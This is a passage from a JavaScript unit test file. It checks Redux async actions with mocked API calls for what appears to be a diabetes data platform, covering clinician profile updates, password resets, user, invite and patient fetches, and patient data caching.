expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip : initialStateForTest }); store.dispatch(async.updateClinicianProfile(api, formValues)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.put.calledWith(userUpdates)).to.be.true; expect(trackMetric.calledWith('Updated Account')).to.be.true; }); context('new clinic workflow enabled and user has pending clinic invites', () => { before(() => { async.__Rewire__('config', { CLINICS_ENABLED: true, }); }); after(() => { async.__ResetDependency__('config'); }); it('should trigger UPDATE_USER_SUCCESS and it should call updateClinicianProfile once for a successful request and route user to workspaces view', () => { let loggedInUserId = 400; let currentUser = { profile: { name: '<NAME>', age: 29 }, password: '<PASSWORD>', emails: [ '<EMAIL>' ], username: 'Joe' }; let formValues = { profile: { name: '<NAME>', age: 30 }, }; let updatingUser = { profile: { name: '<NAME>', age: 30 }, emails: [ '<EMAIL>' ], username: 'Joe' }; let userUpdates = { profile: { name: '<NAME>', age: 30 }, password: '<PASSWORD>' }; let updatedUser = { profile: { name: '<NAME>', age: 30 }, emails: [ '<EMAIL>' ], username: 'Joe', password: '<PASSWORD>' }; let api = { user: { put: sinon.stub().callsArgWith(1, null, updatedUser) } }; let initialStateForTest = _.merge( {}, initialState, { allUsersMap: { [loggedInUserId] : currentUser }, loggedInUserId: loggedInUserId, pendingReceivedClinicianInvites: [{ inviteId: 'invite123' }], } ); let expectedActions = [ { type: 'UPDATE_USER_REQUEST', payload: { userId: loggedInUserId, updatingUser: updatingUser} }, { type: 'UPDATE_USER_SUCCESS', payload: { userId: loggedInUserId, updatedUser: updatedUser } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/workspaces' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip : initialStateForTest }); store.dispatch(async.updateClinicianProfile(api, formValues)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.put.calledWith(userUpdates)).to.be.true; expect(trackMetric.calledWith('Updated Account')).to.be.true; }); }); it('should trigger UPDATE_USER_FAILURE and it should call updateClinicianProfile once for a failed request', () => { let loggedInUserId = 400; let currentUser = { profile: { name: '<NAME>', age: 29 }, password: '<PASSWORD>', emails: [ '<EMAIL>' ], username: 'Joe' }; let formValues = { profile: { name: '<NAME>', age: 30 } }; let updatingUser = { profile: { name: '<NAME>', age: 30 }, emails: [ '<EMAIL>' ], username: 'Joe' }; let userUpdates = { profile: { name: '<NAME>', age: 30 }, password: '<PASSWORD>' }; let api = { user: { put: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_UPDATING_USER); err.status = 500; let initialStateForTest = _.merge({}, initialState, { allUsersMap: { [loggedInUserId] : currentUser }, loggedInUserId: loggedInUserId }); let expectedActions = [ { type: 'UPDATE_USER_REQUEST', payload: { userId: loggedInUserId, updatingUser: updatingUser} }, { type: 'UPDATE_USER_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'}} } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip : initialStateForTest }); store.dispatch(async.updateClinicianProfile(api, formValues)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_USER }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.put.calledWith(userUpdates)).to.be.true; }); }); describe('requestPasswordReset', () => { it('should trigger REQUEST_PASSWORD_RESET_SUCCESS and it should call requestPasswordReset once for a successful request', () => { const email = '<EMAIL>'; let api = { user: { requestPasswordReset: sinon.stub().callsArgWith(1, null) } }; let expectedActions = [ { type: 'REQUEST_PASSWORD_RESET_REQUEST' }, { type: 'REQUEST_PASSWORD_RESET_SUCCESS' } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.requestPasswordReset(api, email)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.requestPasswordReset.calledWith(email)).to.be.true; }); it('should trigger REQUEST_PASSWORD_RESET_FAILURE and it should call requestPasswordReset once for a failed request', () => { const email = '<EMAIL>'; let api = { user: { requestPasswordReset: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_REQUESTING_PASSWORD_RESET); err.status = 500; let expectedActions = [ { type: 'REQUEST_PASSWORD_RESET_REQUEST' }, { type: 'REQUEST_PASSWORD_RESET_FAILURE', error: err, meta: {apiError: {status: 500, body: 'Error!'}} } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.requestPasswordReset(api, email)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_REQUESTING_PASSWORD_RESET }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.requestPasswordReset.calledWith(email)).to.be.true; }); }); describe('confirmPasswordReset', () => { it('should trigger CONFIRM_PASSWORD_RESET_SUCCESS and it should call confirmPasswordReset once for a successful requestPasswordReset', () => { const payload = {}; let api = { user: { confirmPasswordReset: sinon.stub().callsArgWith(1, null) } }; let expectedActions = [ { type: 'CONFIRM_PASSWORD_RESET_REQUEST' }, { type: 'CONFIRM_PASSWORD_RESET_SUCCESS' } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.confirmPasswordReset(api, payload)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.confirmPasswordReset.calledWith(payload)).to.be.true; }); it('should trigger CONFIRM_PASSWORD_RESET_FAILURE and it should call confirmPasswordReset once for a failed requestPasswordReset', () => { const payload = {}; let api = { user: { confirmPasswordReset: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_CONFIRMING_PASSWORD_RESET); err.status = 500; let expectedActions = [ { type: 'CONFIRM_PASSWORD_RESET_REQUEST' }, { type: 'CONFIRM_PASSWORD_RESET_FAILURE', error: err, meta: {apiError: {status: 500, body: 'Error!'}} } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.confirmPasswordReset(api, payload)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CONFIRMING_PASSWORD_RESET }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.confirmPasswordReset.calledWith(payload)).to.be.true; }); }); describe('logError', () => { it('should trigger LOG_ERROR_SUCCESS and it should call error once for a successful request', () => { let error = 'Error'; let message = 'Some random detailed error message!'; let props = { stacktrace: true }; let api = { errors: { log: sinon.stub().callsArgWith(3, null) } }; let expectedActions = [ { type: 'LOG_ERROR_REQUEST' }, { type: 'LOG_ERROR_SUCCESS' } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.logError(api, error, message, props)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.errors.log.withArgs(error, message, props).callCount).to.equal(1); }); }); describe('fetchUser', () => { it('should trigger FETCH_USER_SUCCESS and it should call user.get once for a successful request', () => { let user = { emailVerified: true, username: '<EMAIL>', id: 306, name: '<NAME>' }; let api = { user: { get: sinon.stub().callsArgWith(0, null, user) } }; let expectedActions = [ { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user : user } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchUser(api)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.get.callCount).to.equal(1); }); it('should trigger FETCH_USER_FAILURE and it should call error once for a request for user that has not verified email', () => { let user = { emailVerified: false, username: '<EMAIL>', id: 306, name: '<NAME>' }; let api = { user: { get: sinon.stub().callsArgWith(0, null, user) } }; let expectedActions = [ { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_FAILURE', error: new Error(ErrorMessages.ERR_EMAIL_NOT_VERIFIED), meta: { apiError: null } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchUser(api)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_EMAIL_NOT_VERIFIED }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.get.callCount).to.equal(1); }); it('[401] should trigger FETCH_USER_FAILURE and it should call error once for a failed request', () => { let user = { id: 306, name: '<NAME>' }; let api = { user: { get: sinon.stub().callsArgWith(0, { status: 401 }, null) } }; let expectedActions = [ { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_FAILURE', error: null, meta: { apiError: { status: 401 } } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchUser(api)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.get.callCount).to.equal(1); }); it('[500] should trigger FETCH_USER_FAILURE and it should call error once for a failed request', () => { let user = { id: 306, name: '<NAME>' }; let api = { user: { get: sinon.stub().callsArgWith(0, {status: 500, body: 'Error!'}, null) } }; let err = new Error(ErrorMessages.ERR_FETCHING_USER); err.status = 500; let expectedActions = [ { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchUser(api)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_USER }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.get.callCount).to.equal(1); }); }); describe('fetchPendingSentInvites', () => { it('should trigger FETCH_PENDING_SENT_INVITES_SUCCESS and it should call error once for a successful request', () => { let pendingSentInvites = [ 1, 555, 78191 ]; let api = { invitation: { getSent: sinon.stub().callsArgWith(0, null, pendingSentInvites) } }; let expectedActions = [ { type: 'FETCH_PENDING_SENT_INVITES_REQUEST' }, { type: 'FETCH_PENDING_SENT_INVITES_SUCCESS', payload: { pendingSentInvites : pendingSentInvites } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPendingSentInvites(api)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.invitation.getSent.callCount).to.equal(1); }); it('should trigger FETCH_PENDING_SENT_INVITES_FAILURE and it should call error once for a failed request', () => { let pendingSentInvites = [ 1, 555, 78191 ]; let api = { invitation: { getSent: sinon.stub().callsArgWith(0, {status: 500, body: 'Error!'}, null) } }; let err = new Error(ErrorMessages.ERR_FETCHING_PENDING_SENT_INVITES); err.status = 500; let expectedActions = [ { type: 'FETCH_PENDING_SENT_INVITES_REQUEST' }, { type: 'FETCH_PENDING_SENT_INVITES_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPendingSentInvites(api)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PENDING_SENT_INVITES }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.invitation.getSent.callCount).to.equal(1); }); }); describe('fetchPendingReceivedInvites', () => { it('should trigger FETCH_PENDING_RECEIVED_INVITES_SUCCESS and it should call error once for a successful request', () => { let pendingReceivedInvites = [ 1, 555, 78191 ]; let api = { invitation: { getReceived: sinon.stub().callsArgWith(0, null, pendingReceivedInvites) } }; let expectedActions = [ { type: 'FETCH_PENDING_RECEIVED_INVITES_REQUEST' }, { type: 'FETCH_PENDING_RECEIVED_INVITES_SUCCESS', payload: { pendingReceivedInvites : pendingReceivedInvites } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPendingReceivedInvites(api)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.invitation.getReceived.callCount).to.equal(1); }); it('should trigger FETCH_PENDING_RECEIVED_INVITES_FAILURE and it should call error once for a failed request', () => { let pendingReceivedInvites = [ 1, 555, 78191 ]; let api = { invitation: { getReceived: sinon.stub().callsArgWith(0, {status: 500, body: 'Error!'}, null) } }; let err = new Error(ErrorMessages.ERR_FETCHING_PENDING_RECEIVED_INVITES); err.status = 500; let expectedActions = [ { type: 'FETCH_PENDING_RECEIVED_INVITES_REQUEST' }, { type: 'FETCH_PENDING_RECEIVED_INVITES_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPendingReceivedInvites(api)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PENDING_RECEIVED_INVITES }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.invitation.getReceived.callCount).to.equal(1); }); }); describe('fetchPatient', () => { it('should trigger FETCH_PATIENT_SUCCESS and it should call error once for a successful request', () => { let patient = { id: 58686, name: '<NAME>', age: 65 }; let api = { patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'FETCH_PATIENT_REQUEST' }, { type: 'FETCH_PATIENT_SUCCESS', payload: { patient : patient } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatient(api, 58686)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.patient.get.withArgs(58686).callCount).to.equal(1); }); it('should trigger FETCH_PATIENT_SUCCESS without fetching patient if complete patient record is in cache', () => { let patient = { id: 58686, name: '<NAME>', age: 65, settings: {} }; let api = { patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'FETCH_PATIENT_SUCCESS', payload: { patient : patient } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: { ...initialState, allUsersMap: { 58686: patient, '58686_cacheUntil': 9999999999999, } } }); store.dispatch(async.fetchPatient(api, 58686)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.patient.get.callCount).to.equal(0); }); it('should skip the cache and fetch patient if settings are missing in cached patient record', () => { let patient = { id: 58686, name: '<NAME>', age: 65, settings: undefined }; let api = { patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'FETCH_PATIENT_REQUEST' }, { type: 'FETCH_PATIENT_SUCCESS', payload: { patient : patient } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: { ...initialState, allUsersMap: { 58686: patient, '58686_cacheUntil': 9999999999999, } } }); store.dispatch(async.fetchPatient(api, 58686)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.patient.get.withArgs(58686).callCount).to.equal(1); }); it('[500] should trigger FETCH_PATIENT_FAILURE and it should call error once for a failed request', () => { let patient = { id: 58686, name: '<NAME>', age: 65 }; let api = { patient: { get: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null) } }; let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT); err.status = 500; let expectedActions = [ { type: 'FETCH_PATIENT_REQUEST' }, { type: 'FETCH_PATIENT_FAILURE', error: err, payload: {link: null}, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatient(api, 58686)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.patient.get.withArgs(58686).callCount).to.equal(1); }); it('[404] should trigger FETCH_PATIENT_FAILURE and it should call error once for a failed request', () => { let patient = { id: 58686, name: '<NAME>', age: 65 }; let thisInitialState = Object.assign(initialState, {loggedInUserId: 58686}); let api = { patient: { get: sinon.stub().callsArgWith(1, {status: 404, body: 'Error!'}, null) } }; let err = new Error(ErrorMessages.ERR_YOUR_ACCOUNT_NOT_CONFIGURED); err.status = 404; let expectedActions = [ { type: 'FETCH_PATIENT_REQUEST' }, { type: 'FETCH_PATIENT_FAILURE', error: err, payload: {link: {to: '/patients/new', text: UserMessages.YOUR_ACCOUNT_DATA_SETUP}}, meta: { apiError: {status: 404, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: thisInitialState }); store.dispatch(async.fetchPatient(api, 58686)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_YOUR_ACCOUNT_NOT_CONFIGURED }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.patient.get.withArgs(58686).callCount).to.equal(1); }); it('[401] should trigger FETCH_PATIENT_FAILURE and it should call error once for a failed request', () => { let thisInitialState = Object.assign(initialState, { loggedInUserId: 58686, }); let api = { patient: { get: sinon.stub() .callsArgWith(1, { status: 401, body: 'Error!' }, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT_UNAUTHORIZED); err.status = 401; let expectedActions = [ { type: 'FETCH_PATIENT_REQUEST' }, { type: 'FETCH_PATIENT_FAILURE', error: err, payload: { link: null, }, meta: { apiError: { status: 401, body: 'Error!' } }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: thisInitialState }); store.dispatch(async.fetchPatient(api, 58686)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.patient.get.withArgs(58686).callCount).to.equal(1); }); it('[401 clinician] should trigger FETCH_PATIENT_FAILURE and it should call error once for a failed request', () => { let thisInitialState = Object.assign(initialState, { loggedInUserId: 58688, }); let api = { patient: { get: sinon.stub() .callsArgWith(1, { status: 401, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_FETCHING_PATIENT_CLINICIAN_UNAUTHORIZED ); err.status = 404; let expectedActions = [ { type: 'FETCH_PATIENT_REQUEST' }, { type: 'FETCH_PATIENT_FAILURE', error: err, payload: { link: null, }, meta: { apiError: { status: 401, body: 'Error!' } }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: thisInitialState }); store.dispatch(async.fetchPatient(api, 58686)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_CLINICIAN_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.patient.get.withArgs(58686).callCount).to.equal(1); }); }); describe('fetchAssociatedAccounts', () => { it('should trigger FETCH_ASSOCIATED_ACCOUNTS_SUCCESS and it should call error once for a successful request', () => { const callback = sinon.stub(); let patients = [ { id: 58686, name: '<NAME>', age: 65 } ] let api = { user: { getAssociatedAccounts: sinon.stub().callsArgWith(0, null, { patients }) } }; let expectedActions = [ { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients : patients } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchAssociatedAccounts(api, callback)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.getAssociatedAccounts.callCount).to.equal(1); // assert callback contains payload with no error sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, null, { patients: [{ age: 65, id: 58686, name: '<NAME>' }] }); }); it('should trigger FETCH_ASSOCIATED_ACCOUNTS_FAILURE and it should call error once for a failed request', () => { const callback = sinon.stub(); const error = {status: 500, body: 'Error!'}; let patients = [ { id: 58686, name: '<NAME>', age: 65 } ] let api = { user: { getAssociatedAccounts: sinon.stub().callsArgWith(0, {status: 500, body: error}, null) } }; let err = new Error(ErrorMessages.ERR_FETCHING_ASSOCIATED_ACCOUNTS); err.status = 500; let expectedActions = [ { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_FAILURE', error: err, meta: { apiError: {status: 500, body: error} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchAssociatedAccounts(api, callback)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_ASSOCIATED_ACCOUNTS }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.getAssociatedAccounts.callCount).to.equal(1); // assert callback contains the error sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, { body: error, status: 500 }, null); }); }); describe('fetchPatientData', () => { const patientId = 300; const serverTime = '2018-02-01T00:00:00.000Z'; let options; let patientData; let teamNotes; let uploadRecord; let api; let rollbar; before(() => { rollbar = { info: sinon.stub(), }; async.__Rewire__('rollbar', rollbar); }); beforeEach(() => { options = { startDate: '2018-01-01T00:00:00.000Z', endDate: '2018-01-30T00:00:00.000Z', returnData: false, useCache: true, initial: true, }; patientData = [ { id: 25, value: 540.4, type: 'smbg', time: '2018-01-01T00:00:00.000Z' }, { id: 26, value: 30.8, type: 'smbg', time: '2018-01-30T00:00:00.000Z' }, { id: 27, uploadId: 'upload123', type: 'pumpSettings', time: '2018-05-01T00:00:00.000Z' }, { type: 'upload', id: 'upload789', uploadId: '_upload789', time: '2018-06-01T00:00:00.000Z' }, ]; uploadRecord = [ { type: 'upload', id: 'upload123', uploadId: '_upload123', time: '2018-01-15T00:00:00.000Z'} ]; teamNotes = [ { id: 28, note: 'foo' } ]; api = { patientData: { get: sinon.stub().callsArgWith(2, null, patientData), }, team: { getNotes: sinon.stub().callsArgWith(2, null, teamNotes) }, server: { getTime: sinon.stub().callsArgWith(0, null, { data: { time: serverTime } }) } }; }); afterEach(() => { rollbar.info.resetHistory(); }); after(() => { async.__ResetDependency__('rollbar'); }); context('data is available in cache', () => { it('should not trigger FETCH_PATIENT_DATA_REQUEST by default', () => { let store = mockStore({ blip: { ...initialState, data: { cacheUntil: 9999999999999, }, } }); store.dispatch(async.fetchPatientData(api, options, patientId)); const actions = store.getActions(); expect(actions).to.not.deep.include({ type: 'FETCH_PATIENT_DATA_REQUEST' }); }); it('should not trigger FETCH_PATIENT_DATA_REQUEST if options.useCache is true', () => { let store = mockStore({ blip: { ...initialState, data: { cacheUntil: 9999999999999, }, } }); store.dispatch(async.fetchPatientData(api, { ...options, useCache: true }, patientId)); const actions = store.getActions(); expect(actions).to.not.deep.include({ type: 'FETCH_PATIENT_DATA_REQUEST' }); }); it('should still trigger FETCH_PATIENT_DATA_REQUEST if options.useCache is false', () => { let store = mockStore({ blip: { ...initialState, data: { cacheUntil: 9999999999999, }, }, router: { location: { pathname: `data/${patientId}` } } }); store.dispatch(async.fetchPatientData(api, { ...options, useCache: false }, patientId)); const actions = store.getActions(); expect(actions).to.deep.include({ type: 'FETCH_PATIENT_DATA_REQUEST', payload: { patientId } }); }); }); context('initial data fetch', () => { it('trigger FETCH_PATIENT_DATA_FAILURE and it should call error once for a failed request due to intial patient data call returning error', () => { api.patientData = { get: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }; let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT_DATA); err.status = 500; let expectedActions = [ { type: 'FETCH_SERVER_TIME_REQUEST'}, { type: 'FETCH_SERVER_TIME_SUCCESS', payload: { serverTime } }, { type: 'FETCH_PATIENT_DATA_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatientData(api, options, patientId)); const actions = store.getActions(); expect(actions[2].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_DATA }); expectedActions[2].error = actions[2].error; expect(actions).to.eql(expectedActions); }); it('[403] trigger FETCH_PATIENT_DATA_FAILURE and it should call error once for a failed request due to intial patient data call returning error', () => { api.patientData = { get: sinon.stub().callsArgWith(2, {status: 403, body: 'Error!'}, null), }; let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT_DATA_UNAUTHORIZED); err.status = 403; let expectedActions = [ { type: 'FETCH_SERVER_TIME_REQUEST' }, { type: 'FETCH_SERVER_TIME_SUCCESS', payload: { serverTime } }, { type: 'FETCH_PATIENT_DATA_FAILURE', error: err, meta: { apiError: { status: 403, body: 'Error!' } }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: { ...initialState, ...{ loggedInUserId: patientId } }, }); store.dispatch(async.fetchPatientData(api, options, patientId)); const actions = store.getActions(); expect(actions[2].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_DATA_UNAUTHORIZED }); expectedActions[2].error = actions[2].error; expect(actions).to.eql(expectedActions); }); it('[403 clinician] trigger FETCH_PATIENT_DATA_FAILURE and it should call error once for a failed request due to intial patient data call returning error', () => { api.patientData = { get: sinon.stub().callsArgWith(2, {status: 403, body: 'Error!'}, null), }; let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT_DATA_CLINICIAN_UNAUTHORIZED); err.status = 403; let expectedActions = [ { type: 'FETCH_SERVER_TIME_REQUEST' }, { type: 'FETCH_SERVER_TIME_SUCCESS', payload: { serverTime } }, { type: 'FETCH_PATIENT_DATA_FAILURE', error: err, meta: { apiError: { status: 403, body: 'Error!' } }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: { ...initialState, ...{ loggedInUserId: 'clinicianuser123' }, }, }); store.dispatch(async.fetchPatientData(api, options, patientId)); const actions = store.getActions(); expect(actions[2].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_DATA_CLINICIAN_UNAUTHORIZED }); expectedActions[2].error = actions[2].error; expect(actions).to.eql(expectedActions); }); it('should use server time (plus 1 day, minus 30) for date range of data fetching if all latest diabetes datums returns empty results', () => { let store = mockStore({ blip: { ...initialState, }, router: { location: { pathname: `data/${patientId}` } } }); // Set all times in response to 1 year past server time api.patientData.get = sinon.stub().callsArgWith(2, null, []); store.dispatch(async.fetchPatientData(api, options, patientId)); expect(api.server.getTime.callCount).to.equal(1); expect(api.patientData.get.withArgs(patientId, { ...options, startDate: '2018-01-02T00:00:00.000Z', // 30 days before serverTime endDate: '2018-02-02T00:00:00.000Z', // 1 day beyond serverTime }).callCount).to.equal(1); }); it('should fetch the latest data for all diabetes types and pumpSettings', () => { let store = mockStore({ blip: { ...initialState, }, router: { location: { pathname: `data/${patientId}` } } }); store.dispatch(async.fetchPatientData(api, options, patientId)); expect(api.patientData.get.withArgs(patientId, { type: [ 'cbg', 'smbg', 'basal', 'bolus', 'wizard', 'food', 'pumpSettings', 'upload', ].join(','), latest: 1, endDate: '2018-02-02T00:00:00.000Z', // 1 day beyond serverTime }).callCount).to.equal(1); }); it('should fetch the patient data 30 days prior to the latest diabetes datum time returned', () => { let store = mockStore({ blip: { ...initialState, }, router: { location: { pathname: `data/${patientId}` } } }); api.patientData.get = sinon.stub().callsArgWith(2, null, patientData); store.dispatch(async.fetchPatientData(api, options, patientId)); expect(api.patientData.get.callCount).to.equal(3); // Should set the start date based on the latest smbg, even though the pump settings and upload are more recent expect(api.patientData.get.withArgs(patientId, { ...options, startDate: '2017-12-31T00:00:00.000Z', endDate: '2018-01-31T00:00:00.000Z', }).callCount).to.equal(1); }); }); context('handleFetchSuccess', () => { beforeEach(() => { options.initial = false; }); context('fetching data for current patient in view', () => { it('should trigger FETCH_PATIENT_DATA_SUCCESS and DATA_WORKER_ADD_DATA_REQUEST', () => { options.getPumpSettingsUploadRecordById = 'upload123'; api.patientData = { get: sinon.stub() .onFirstCall().callsArgWith(2, null, patientData) .onSecondCall().callsArgWith(2, null, [ uploadRecord ]), }; let expectedActions = [ { type: 'FETCH_PATIENT_DATA_REQUEST', payload: { patientId } }, { type: 'FETCH_PATIENT_DATA_SUCCESS', payload: { patientId } }, { type: 'DATA_WORKER_ADD_DATA_REQUEST', meta: { WebWorker: true, worker: 'data', origin: 'http://originStub', patientId }, payload: { data: JSON.stringify([...patientData, uploadRecord, ...teamNotes]), fetchedCount: 6, patientId: patientId, fetchedUntil: '2018-01-01T00:00:00.000Z', returnData: false, }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: { ...initialState, }, router: { location: { pathname: `data/${patientId}` } } }); store.dispatch(async.fetchPatientData(api, options, patientId)); const actions = store.getActions(); actions[2].meta.origin = 'http://originStub'; expect(actions).to.eql(expectedActions); expect(api.patientData.get.withArgs(patientId, options).callCount).to.equal(1); expect(api.team.getNotes.withArgs(patientId).callCount).to.equal(1); }); }); context('not fetching data for current patient in view (i.e. stale request)', () => { it('should only trigger FETCH_PATIENT_DATA_SUCCESS and not DATA_WORKER_ADD_DATA_REQUEST', () => { const otherPatientId = 'xyz<PASSWORD>'; let expectedActions = [ { type: 'FETCH_PATIENT_DATA_REQUEST', payload: { patientId } }, { type: 'FETCH_PATIENT_DATA_SUCCESS', payload: { patientId } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ 